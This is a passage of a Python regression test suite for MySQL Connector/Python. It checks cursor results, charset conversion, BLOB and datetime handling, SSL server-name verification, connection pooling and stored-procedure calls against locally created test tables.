"""Test results from get_rows are the same in pure and using c-ext"""
self.cnx_pure.cmd_query(self.test_sql_single_result)
res_pure = self.cnx_pure.get_rows()
self.cnx_cext.cmd_query(self.test_sql_single_result)
res_cext = self.cnx_cext.get_rows()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs"
"from c-ext result {}".format(res_pure, res_cext))
def test_get_row_raw(self):
"""Test result from get_row is the same in pure and using c-ext"""
self.cnx_pure_raw.cmd_query(self.test_sql_single_result)
res_pure = self.cnx_pure_raw.get_row()
self.cnx_cext_raw.cmd_query(self.test_sql_single_result)
res_cext = self.cnx_cext_raw.get_row()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs"
"from c-ext result {}".format(res_pure, res_cext))
def test_get_rows_raw(self):
"""Test results from get_rows are the same in pure and using c-ext"""
self.cnx_pure_raw.cmd_query(self.test_sql_single_result)
res_pure = self.cnx_pure_raw.get_rows()
self.cnx_cext_raw.cmd_query(self.test_sql_single_result)
res_cext = self.cnx_cext_raw.get_rows()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs"
"from c-ext result {}".format(res_pure, res_cext))
def _test_fetchone(self, cur_pure, cur_cext):
"""Test result from fetchone is the same in pure and using c-ext"""
cur_pure.execute(self.test_sql_single_result)
res_pure = cur_pure.fetchone()
_ = cur_pure.fetchall()
cur_cext.execute(self.test_sql_single_result)
res_cext = cur_cext.fetchone()
_ = cur_cext.fetchall()
self.cnx_cext.free_result()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs"
"from c-ext result {}".format(res_pure, res_cext))
def _test_fetchmany(self, cur_pure, cur_cext):
"""Test results from fetchmany are the same in pure and using c-ext"""
cur_pure.execute(self.test_sql_single_result)
res_pure = cur_pure.fetchmany()
cur_cext.execute(self.test_sql_single_result)
res_cext = cur_cext.fetchmany()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs"
"from c-ext result {}".format(res_pure, res_cext))
res_pure = cur_pure.fetchmany(2)
res_cext = cur_cext.fetchmany(2)
_ = cur_pure.fetchall()
_ = cur_cext.fetchall()
self.cnx_cext.free_result()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs"
"from c-ext result {}".format(res_pure, res_cext))
def _test_fetch_fetchall(self, cur_pure, cur_cext):
"""Test results from fetchall are the same in pure and using c-ext"""
cur_pure.execute(self.test_sql_single_result)
res_pure = cur_pure.fetchall()
cur_cext.execute(self.test_sql_single_result)
res_cext = cur_cext.fetchall()
self.cnx_cext.free_result()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs"
"from c-ext result {}".format(res_pure, res_cext))
def test_cursor(self):
"""Test results from cursor are the same in pure and using c-ext"""
cur_pure = self.cnx_pure.cursor()
cur_cext = self.cnx_cext.cursor()
self._test_fetchone(cur_pure, cur_cext)
self._test_fetchmany(cur_pure, cur_cext)
self._test_fetch_fetchall(cur_pure, cur_cext)
cur_pure.close()
cur_cext.close()
def test_cursor_raw(self):
"""Test results from cursor raw are the same in pure and using c-ext"""
raw = True
cur_pure_raw = self.cnx_pure.cursor(raw=raw)
cur_cext_raw = self.cnx_cext.cursor(raw=raw)
self._test_fetchone(cur_pure_raw, cur_cext_raw)
self._test_fetchmany(cur_pure_raw, cur_cext_raw)
self._test_fetch_fetchall(cur_pure_raw, cur_cext_raw)
cur_pure_raw.close()
cur_cext_raw.close()
def test_cursor_buffered(self):
"""Test results from cursor buffered are the same in pure or c-ext"""
buffered = True
cur_pure_buffered = self.cnx_pure.cursor(buffered=buffered)
cur_cext_buffered = self.cnx_cext.cursor(buffered=buffered)
self._test_fetchone(cur_pure_buffered, cur_cext_buffered)
self._test_fetchmany(cur_pure_buffered, cur_cext_buffered)
self._test_fetch_fetchall(cur_pure_buffered, cur_cext_buffered)
cur_pure_buffered.close()
cur_cext_buffered.close()
def test_cursor_dictionary(self):
"""Test results from cursor buffered are the same in pure or c-ext"""
cur_pure_dictionary = self.cnx_pure.cursor(dictionary=True)
cur_cext_dictionary = self.cnx_cext.cursor(dictionary=True)
self._test_fetchone(cur_pure_dictionary, cur_cext_dictionary)
self._test_fetchmany(cur_pure_dictionary, cur_cext_dictionary)
self._test_fetch_fetchall(cur_pure_dictionary, cur_cext_dictionary)
cur_pure_dictionary.close()
cur_cext_dictionary.close()
def test_cursor_dictionary_buf(self):
"""Test results from cursor buffered are the same in pure or c-ext"""
cur_pure = self.cnx_pure.cursor(dictionary=True,
buffered=True)
cur_cext = self.cnx_cext.cursor(dictionary=True,
buffered=True)
self._test_fetchone(cur_pure, cur_cext)
self._test_fetchmany(cur_pure, cur_cext)
self._test_fetch_fetchall(cur_pure, cur_cext)
cur_pure.close()
cur_cext.close()
class BugOra28239074(tests.MySQLConnectorTests):
"""BUG#28239074: CURSOR DICTIONARY DOES NOT RETURN DICTIONARY TYPE RESULTS
"""
table = "bug28239074"
def setUp(self):
config_pure = tests.get_mysql_config()
config_pure["use_pure"] = True
self.cnx = mysql.connector.connect(**config_pure)
cur = self.cnx.cursor(dictionary=True)
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table))
cur.execute("CREATE TABLE {0}(a char(50) ,b int) "
"DEFAULT CHARSET utf8".format(self.table))
data = [(chr(1), 1),('s', 2),(chr(120), 3),(chr(121), 4),(chr(127), 5)]
cur.executemany("INSERT INTO {0} (a, b) VALUES "
"(%s, %s)".format(self.table), data)
def tearDown(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {}".format(self.table))
self.cnx.close()
def test_cursor_dict(self):
exp = [
{u'a': u'\x01', u'b': 1},
{u'a': u's', u'b': 2},
{u'a': u'\x78', u'b': 3},
{u'a': u'\x79', u'b': 4},
{u'a': u'\x7f', u'b': 5}
]
cur = self.cnx.cursor(dictionary=True)
# Test fetchone
cur.execute("SELECT * FROM {}".format(self.table))
i = 0
row = cur.fetchone()
while row is not None:
self.assertTrue(isinstance(row, dict))
self.assertEqual(exp[i], row, "row {} is not equal to expected row"
" {}".format(row, exp[i]))
row = cur.fetchone()
i += 1
# Test fetchall
cur.execute("SELECT * FROM {}".format(self.table))
rows = cur.fetchall()
self.assertEqual(exp, rows, "rows {} is not equal to expected row")
# Test for each in cursor
cur.execute("SELECT * FROM {}".format(self.table))
i = 0
for row in cur:
self.assertTrue(isinstance(row, dict))
self.assertEqual(exp[i], row, "row {} is not equal to expected row"
" {}".format(row, exp[i]))
i += 1
class BugOra27364914(tests.MySQLConnectorTests):
"""BUG#27364914: CURSOR PREPARED STATEMENTS DO NOT CONVERT STRINGS
"""
charsets_list = ('gbk', 'sjis', 'big5', 'utf8', 'utf8mb4', 'latin1')
def setUp(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor(cursor_class=cursor.MySQLCursorPrepared)
for charset in self.charsets_list:
tablename = '{0}_ps_test'.format(charset)
cur.execute("DROP TABLE IF EXISTS {0}".format(tablename))
table = (
"CREATE TABLE {table} ("
" id INT AUTO_INCREMENT KEY,"
" c1 VARCHAR(40),"
" val2 datetime"
") CHARACTER SET '{charset}'"
).format(table=tablename, charset=charset)
cur.execute(table)
cnx.commit()
cur.close()
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
for charset in self.charsets_list:
tablename = '{0}_ps_test'.format(charset)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(tablename))
cnx.close()
def _test_charset(self, charset, data):
config = tests.get_mysql_config()
config['charset'] = charset
config['use_unicode'] = True
self.cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = self.cnx.cursor(cursor_class=cursor.MySQLCursorPrepared)
tablename = '{0}_ps_test'.format(charset)
cur.execute("TRUNCATE {0}".format(tablename))
self.cnx.commit()
insert = "INSERT INTO {0} (c1) VALUES (%s)".format(tablename)
for value in data:
cur.execute(insert, (value,))
self.cnx.commit()
cur.execute("SELECT id, c1 FROM {0} ORDER BY id".format(tablename))
for row in cur.fetchall():
self.assertTrue(isinstance(row[1], STRING_TYPES),
"The value is expected to be a string")
self.assertEqual(data[row[0] - 1], row[1])
cur.close()
self.cnx.close()
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_gbk(self):
self._test_charset('gbk', [u'赵孟頫', u'赵\孟\頫\\', u'遜'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_sjis(self):
self._test_charset('sjis', ['\u005c'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_big5(self):
self._test_charset('big5', ['\u5C62'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_utf8mb4(self):
self._test_charset('utf8mb4', ['\u5C62'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_utf8(self):
self._test_charset('utf8', [u'データベース', u'데이터베이스'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_latin1(self):
self._test_charset('latin1', [u'ñ', u'Ñ'])
class BugOra27802700(tests.MySQLConnectorTests):
"""BUG#27802700: A BYTEARRAY IS RETURNED FROM USING get_rows METHOD
"""
table_name = "BugOra27802700"
insert_stmt = u"INSERT INTO {} ({}) values ({{value}})"
def setUp(self):
config = tests.get_mysql_config()
config['charset'] = "utf8"
config['use_unicode'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {}".format(self.table_name))
cur.execute("CREATE TABLE IF NOT EXISTS {} ("
" id INT(11) UNSIGNED AUTO_INCREMENT UNIQUE KEY,"
" int_long INT,"
" time TIME,"
" date DATE,"
" datetime DATETIME,"
" var_char VARCHAR(50),"
" long_blob LONGBLOB,"
" str TEXT) CHARACTER SET utf8"
" COLLATE utf8_general_ci".format(self.table_name))
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
try:
cur.execute("DROP TABLE IF EXISTS {}".format(self.table_name))
except:
pass
def run_test_retrieve_stored_type(self, stm, test_values, expected_values,
column, expected_type):
config = tests.get_mysql_config()
config['charset'] = "utf8"
config['use_unicode'] = True
config['autocommit'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
for test_value in test_values:
cnx.cmd_query(stm.format(value=test_value))
qry = "SELECT {column} FROM {table} ORDER BY id"
cur.execute(qry.format(column=column, table=self.table_name))
rows = cnx.get_rows()[0][len(test_values) * (-1):]
for returned_val, expected_value in zip(rows, expected_values):
self.assertEqual(returned_val[0], expected_value)
self.assertTrue(isinstance(returned_val[0], expected_type))
cur.close()
cnx.close()
@foreach_cnx()
def test_retrieve_stored_int_long(self):
column = "int_long"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ["-12345", "0", "12345"]
expected_values = [-12345, 0, 12345]
if PY2:
expected_type = (int, long)
else:
expected_type = (int)
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_str(self):
column = "str"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ['\' \'', '\'some text\'', u'\'データベース\'',
'\'"12345"\'']
expected_values = [' ', 'some text', u'データベース', '"12345"']
expected_type = STRING_TYPES
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_blob(self):
column = "long_blob"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ['\' \'', '\'some text\'', u'\'データベース\'',
"\"'12345'\""]
expected_values = [b' ', b'some text', b'\xe3\x83\x87\xe3\x83\xbc\xe3'
b'\x82\xbf\xe3\x83\x99\xe3\x83\xbc\xe3\x82\xb9'
if PY2 else u'データベース'.encode("utf-8"),
b"'12345'"]
expected_type = bytes
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_varchar(self):
column = "var_char"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ['\' \'', '\'some text\'', u'\'データベース\'',
"'12345'"]
expected_values = [' ', 'some text', u'データベース', "12345"]
expected_type = STRING_TYPES
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_datetime_types(self):
column = "datetime"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ["cast('1972-01-01 00:42:49.000000' as DATETIME)",
"cast('2018-01-01 23:59:59.000000' as DATETIME)"]
expected_values = [datetime(1972, 1, 1, 0, 42, 49),
datetime(2018, 1, 1, 23, 59, 59)]
expected_type = datetime
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_date_types(self):
column = "date"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ["DATE('1972-01-01')",
"DATE('2018-12-31')"]
expected_values = [date(1972, 1, 1),
date(2018, 12, 31)]
expected_type = date
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_time_types(self):
column = "time"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ["TIME('00:42:49.00000')",
"TIME('23:59:59.00000')"]
expected_values = [timedelta(hours=0, minutes=42, seconds=49),
timedelta(hours=23, minutes=59, seconds=59)]
expected_type = timedelta
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
class BugOra27277937(tests.MySQLConnectorTests):
"""BUG#27277937: CONFUSING ERROR MESSAGE WHEN SPECIFYING UNSUPPORTED
COLLATION
"""
def setUp(self):
pass
def test_invalid_collation(self):
config = tests.get_mysql_config()
config["charset"] = "utf8"
config["collation"] = "foobar"
self.cnx = connection.MySQLConnection()
try:
self.cnx.connect(**config)
except errors.ProgrammingError as err:
self.assertEqual(err.msg, "Collation 'foobar' unknown.")
else:
self.fail("A ProgrammingError was expected")
def tearDown(self):
pass
class BugOra28188883(tests.MySQLConnectorTests):
"""BUG#27277937: DEPRECATED UTF8 IS THE DEFAULT CHARACTER SET IN 8.0
"""
def setUp(self):
# Remove charset from the connection configuration if is set, so the
# default charset 'utf8mb4' is used for each connection
self.config = tests.get_mysql_config().copy()
if "charset" in self.config:
del self.config
@foreach_cnx()
def test_utf8mb4_default_charset(self):
self.assertEqual(self.cnx.charset, "utf8mb4")
data = [(1, u'🐬'), (2, u'🐍'), (3, u'🐶')]
tbl = "BugOra28188883"
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(tbl))
cur.execute("CREATE TABLE {0} (id INT, name VARCHAR(100)) "
"DEFAULT CHARSET utf8mb4".format(tbl))
stmt = "INSERT INTO {0} (id, name) VALUES (%s, %s)".format(tbl)
cur.executemany(stmt, data)
cur.execute("SELECT id, name FROM {0}".format(tbl))
self.assertEqual(data, cur.fetchall())
cur.execute("DROP TABLE IF EXISTS {0}".format(tbl))
cur.close()
self.cnx.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 23),
"MySQL 5.7.23+ is required for VERIFY_IDENTITY")
@unittest.skipIf(sys.version_info < (2, 7, 9),
"Python 2.7.9+ is required for SSL")
class BugOra27434751(tests.MySQLConnectorTests):
"""BUG#27434751: MYSQL.CONNECTOR HAS NO TLS/SSL OPTION TO VERIFY SERVER NAME
"""
def setUp(self):
ssl_ca = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'))
ssl_cert = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_cert.pem'))
ssl_key = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_key.pem'))
self.config = tests.get_mysql_config()
self.config.pop("unix_socket")
self.config["ssl_ca"] = ssl_ca
self.config["ssl_cert"] = ssl_cert
self.config["ssl_key"] = ssl_key
self.config["ssl_verify_cert"] = True
def _verify_server_name_cnx(self, use_pure=True):
config = self.config.copy()
config["use_pure"] = use_pure
# Setting an invalid host name against a server certificate
config["host"] = "127.0.0.1"
# Should connect with ssl_verify_identity=False
config["ssl_verify_identity"] = False
cnx = mysql.connector.connect(**config)
cnx.close()
# Should fail to connect with ssl_verify_identity=True
config["ssl_verify_identity"] = True
self.assertRaises(errors.InterfaceError, mysql.connector.connect,
**config)
# Should connect with the correct host name and ssl_verify_identity=True
config["host"] = "localhost"
cnx = mysql.connector.connect(**config)
cnx.close()
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_verify_server_name_cext_cnx(self):
self._verify_server_name_cnx(use_pure=False)
def test_verify_server_name_pure_cnx(self):
self._verify_server_name_cnx(use_pure=True)
@unittest.skipIf(CMySQLConnection, "Test only available without C Extension")
class BugOra27794178(tests.MySQLConnectorTests):
"""BUG#27794178: USING USE_PURE=FALSE SHOULD RAISE AN ERROR WHEN CEXT IS NOT
AVAILABLE
"""
def test_connection_use_pure(self):
config = tests.get_mysql_config().copy()
if "use_pure" in config:
del config["use_pure"]
cnx = mysql.connector.connect(**config)
cnx.close()
# Force using C Extension should fail if not available
config["use_pure"] = False
self.assertRaises(ImportError, mysql.connector.connect, **config)
class Bug27897881(tests.MySQLConnectorTests):
"""BUG#27897881: Fix typo in BLOB data conversion
"""
def setUp(self):
self.config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**self.config)
cursor = cnx.cursor()
self.tbl = 'Bug27897881'
cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
create = ('CREATE TABLE {0}(col1 INT NOT NULL, col2 LONGBLOB, '
'PRIMARY KEY(col1))'.format(self.tbl))
cursor.execute(create)
cursor.close()
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**self.config)
cursor = cnx.cursor()
cursor.execute("DROP TABLE IF EXISTS {}".format(self.tbl))
cursor.close()
cnx.close()
@foreach_cnx()
def test_retrieve_from_LONGBLOB(self):
cnx_config = self.config.copy()
cnx_config['charset'] = "utf8"
cnx_config['use_unicode'] = True
cnx = connection.MySQLConnection(**cnx_config)
cur = cnx.cursor()
# Empty blob produces index error.
# "12345" handle as datetime in JSON produced index error.
# LONGBLOB can store big data
test_values = ["", "12345", '"54321"', "A"*(2**20)]
expected_values = [b"", b"12345", b'"54321"', b"A"*(2**20)]
stm = "INSERT INTO {} (col1, col2) VALUES ('{}', '{}')"
for num, test_value in zip(range(len(test_values)), test_values):
cur.execute(stm.format(self.tbl, num, test_value))
stm = "SELECT * FROM {} WHERE col1 like '{}'"
for num, expected_value in zip(range(len(test_values)), expected_values):
cur.execute(stm.format(self.tbl, num))
row = cur.fetchall()[0]
self.assertEqual(row[1], expected_value, "value {} is not "
"the expected {}".format(row[1], expected_value))
cur.close()
cnx.close()
class BugOra29324966(tests.MySQLConnectorTests):
"""BUG#29324966: ADD MISSING USERNAME CONNECTION ARGUMENT FOR DRIVER
COMPATIBILITY.
"""
def setUp(self):
pass
def tearDown(self):
pass
@foreach_cnx()
def test_connection_args_compatibility(self):
config = self.config.copy()
config["username"] = config["user"]
config["passwd"] = config["password"]
config["db"] = config["database"]
config["connect_timeout"] = config["connection_timeout"]
config.pop("user")
config.pop("password")
config.pop("database")
config.pop("connection_timeout")
cnx = self.cnx.__class__(**config)
cnx.close()
class Bug20811567(tests.MySQLConnectorTests):
"""BUG#20811567: Support use_pure option in config files.
"""
def write_config_file(self, use_pure, test_file):
temp_cnf_file = os.path.join(os.getcwd(), test_file)
with open(temp_cnf_file, "w") as cnf_file:
config = tests.get_mysql_config()
config["use_pure"] = use_pure
cnf = "[connector_python]\n"
cnf += "\n".join(["{0} = {1}".format(key, value)
for key, value in config.items()])
cnf_file.write(cnf)
@foreach_cnx()
def test_support_use_pure_option_in_config_files(self):
if self.cnx.__class__ == CMySQLConnection:
temp_cnf_file = "temp_cnf_file_not_pure.cnf"
use_pure = False
else:
temp_cnf_file = "temp_cnf_file_use_pure.cnf"
use_pure = True
# Prepare config file.
self.write_config_file(use_pure, temp_cnf_file)
# Get connection
with mysql.connector.connect(option_files=temp_cnf_file) as cnx:
self.assertEqual(self.cnx.__class__, cnx.__class__)
# Remove config file
os.remove(temp_cnf_file)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 17),
"MySQL 8.0.17+ is required for utf8mb4_0900_bin collation")
class BugOra29855733(tests.MySQLConnectorTests):
"""BUG#29855733: ERROR DURING THE CLASSIC CONNECTION WITH CHARSET AND
COLLATION SPECIFIED.
"""
def setUp(self):
pass
def tearDown(self):
pass
@foreach_cnx()
def test_connection_collation_utf8mb4_0900_bin(self):
config = self.config.copy()
config["username"] = config["user"]
config["passwd"] = config["password"]
config["charset"] = "utf8mb4"
config["collation"] = "utf8mb4_0900_bin"
cnx = self.cnx.__class__(**config)
cnx.close()
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class BugOra25349794(tests.MySQLConnectorTests):
"""BUG#25349794: ADD READ_DEFAULT_FILE ARGUMENT FOR CONNECT().
"""
def setUp(self):
pass
def tearDown(self):
pass
@foreach_cnx()
def test_read_default_file_alias(self):
opt_file = os.path.join("tests", "data", "option_files", "pool.cnf")
config = tests.get_mysql_config()
if tests.MYSQL_VERSION < (5, 7):
config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
conn = mysql.connector.connect(read_default_file=opt_file,
option_groups=["pooling"], **config)
self.assertEqual("my_pool", conn.pool_name)
mysql.connector._CONNECTION_POOLS = {}
conn.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 8), "No JSON support")
class BugOra29808262(tests.MySQLConnectorTests):
"""BUG#229808262: TEXT COLUMN WITH ONLY DIGITS READS IN AS INT.
"""
table_name = "BugOra29808262"
def setUp(self):
pass
def tearDown(self):
pass
@foreach_cnx()
def test_blob_fields(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {}".format(self.table_name))
cur.execute("CREATE TABLE {} ("
" my_blob BLOB,"
" my_longblob LONGBLOB,"
" my_json JSON,"
" my_text TEXT) CHARACTER SET utf8"
" COLLATE utf8_general_ci".format(self.table_name))
test_values = (
"BLOB" * (2**10),
"LONG_BLOB" * (2**20),
'{"lat": "41.14961", "lon": "-8.61099", "name": "Porto"}',
"My TEXT",
)
expected_values = (
b"BLOB" * (2**10),
b"LONG_BLOB" * (2**20),
'{"lat": "41.14961", "lon": "-8.61099", "name": "Porto"}',
"My TEXT",
)
cur = self.cnx.cursor()
cur.execute("INSERT INTO {} VALUES ('{}')"
"".format(self.table_name, "', '".join(test_values)))
cur.execute("SELECT my_blob, my_longblob, my_json, my_text FROM {}"
"".format(self.table_name))
res = cur.fetchall()
self.assertEqual(res[0], expected_values)
cur.execute("DROP TABLE IF EXISTS {}".format(self.table_name))
cur.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 3),
"MySQL >= 5.7.3 is required for reset command")
@unittest.skipIf(CMySQLConnection is None,
"CMySQLConnection is required but is not available")
class Bug27489937(tests.MySQLConnectorTests):
"""BUG#27489937: SUPPORT C EXTENSION FOR CONNECTION POOLS
"""
def setUp(self):
self.config = tests.get_mysql_config()
self.config['pool_name'] = 'Bug27489937'
self.config['pool_size'] = 3
self.config['use_pure'] = False
try:
del mysql.connector._CONNECTION_POOLS[self.config['pool_name']]
except:
pass
def tearDown(self):
# Remove pools created by test
del mysql.connector._CONNECTION_POOLS[self.config['pool_name']]
def test_cext_pool_support(self):
"""Basic pool tests"""
cnx_list = []
session_ids = []
for _ in range(self.config['pool_size']):
cnx = mysql.connector.connect(**self.config)
self.assertIsInstance(cnx, PooledMySQLConnection,
"Expected a CMySQLConnection instance")
self.assertIsInstance(cnx._cnx, CMySQLConnection,
"Expected a CMySQLConnection instance")
cnx_list.append(cnx)
exp_session_id = cnx.connection_id
session_ids.append(exp_session_id)
cnx.cmd_query("SET @ham = 2")
cnx.cmd_reset_connection()
cnx.cmd_query("SELECT @ham")
self.assertEqual(exp_session_id, cnx.connection_id)
exp = ('2',) if PY2 else (b'2',)
self.assertNotEqual(exp, cnx.get_rows()[0][0])
self.assertRaises(errors.PoolError, mysql.connector.connect,
**self.config)
for cnx in cnx_list:
cnx.close()
cnx = mysql.connector.connect(**self.config)
cnx.cmd_query("SELECT @ham")
self.assertIn(cnx.connection_id, session_ids,
"Pooled connection was not reused.")
exp = ('2',) if PY2 else (b'2',)
self.assertNotEqual(exp, cnx.get_rows()[0][0])
class BugOra29195610(tests.MySQLConnectorTests):
"""BUG#29195610: CALLPROC() NOT SUPPORTED WITH NAMED TUPLE CURSOR AND FOR
DICT CURSOR IS IGNORED
"""
def setUp(self):
config = tests.get_mysql_config()
with connection.MySQLConnection(**config) as cnx:
cnx.cmd_query("DROP TABLE IF EXISTS bug29195610")
cnx.cmd_query("DROP PROCEDURE IF EXISTS sp_bug29195610")
cnx.cmd_query("CREATE TABLE bug29195610 (id INT, name VARCHAR(5))")
cnx.cmd_query(
"INSERT INTO bug29195610 (id, name) VALUES (2020, 'Foo')"
)
cnx.cmd_query(
"CREATE PROCEDURE sp_bug29195610 (in_id INT) "
"SELECT id, name FROM bug29195610 WHERE id = in_id;"
)
def tearDown(self):
config = tests.get_mysql_config()
with connection.MySQLConnection(**config) as cnx:
cnx.cmd_query("DROP TABLE IF EXISTS bug29195610")
cnx.cmd_query("DROP PROCEDURE IF EXISTS sp_bug29195610")
@foreach_cnx()
def test_callproc_cursor_types(self):
named_tuple = namedtuple("Row", ["id", "name"])
cases = [
(
{},
[(2020, "Foo")]
),
(
{"buffered": True},
[(2020, "Foo")]
),
(
{"raw": True},
[(bytearray(b"2020"), bytearray(b"Foo"))]
),
(
{"raw": True, "buffered": True},
[(bytearray(b"2020"), bytearray(b"Foo"))]
),
(
{"raw": True, "buffered": True},
[(bytearray(b"2020"), bytearray(b"Foo"))]
),
(
{"dictionary": True},
[{"id": 2020, "name": "Foo"}]
),
(
{"dictionary": True, "buffered": True},
[{"id": 2020, "name": "Foo"}]
),
(
{"named_tuple": True},
[named_tuple(2020, "Foo")]
),
(
{"named_tuple": True, "buffered": True},
[named_tuple(2020, "Foo")]
)
]
for cursor_type, exp in cases:
with self.cnx.cursor(**cursor_type) as cur:
cur.callproc("sp_bug29195610", (2020,))
for res in cur.stored_results():
self.assertEqual(exp, res.fetchall())
with self.cnx.cursor(prepared=True) as cur:
self.assertRaises(errors.NotSupportedError,
cur.callproc, 'sp_bug29195610', (2020,))
class BugOra24938411(tests.MySQLConnectorTests):
"""BUG#24938411: FIX MICROSECOND CONVERSION FROM MYSQL DATETIME TO PYTHON
DATETIME.
"""
@tests.foreach_cnx()
def test_datetime_fractional(self):
with self.cnx.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS bug24938411")
cur.execute(
"CREATE TABLE bug24938411 "
"(mydate datetime(3) DEFAULT NULL) ENGINE=InnoDB"
)
cur.execute(
'INSERT INTO bug24938411 (mydate) '
'VALUES ("2020-01-01 01:01:01.543")'
)
cur.execute(
"SELECT mydate, CAST(mydate AS CHAR) AS mydate_char "
"FROM bug24938411"
)
row = cur.fetchone()
self.assertEqual(row[0], datetime(2020, 1, 1, 1, 1, 1, 543000))
self.assertEqual(row[1], "2020-01-01 01:01:01.543")
cur.execute("DROP TABLE IF EXISTS bug24938411")
class BugOra32165864(tests.MySQLConnectorTests):
"""BUG#32165864: SEGMENTATION FAULT WHEN TWO PREPARED STATEMENTS WITH
INCORRECT SQL SYNTAX ARE EXECUTED CONSECUTIVELY.
"""
@foreach_cnx()
def test_segfault_prepared_statement(self):
with self.cnx.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS bug32165864")
cur.execute(
"CREATE TABLE bug32165864 "
"(id INT, name VARCHAR(10), address VARCHAR(20))"
)
cur.execute(
"INSERT INTO bug32165864 (id, name, address) VALUES "
"(1, 'Joe', 'Street 1'), (2, 'John', 'Street 2')"
)
self.cnx.commit()
stmt = "SELECT * FROM customer WHERE i = ? ?"
with self.cnx.cursor(prepared=True) as cur:
for _ in range(10):
self.assertRaises(
errors.Error, cur.execute, stmt, (10, "Gabriela")
)
with self.cnx.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS bug32165864")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.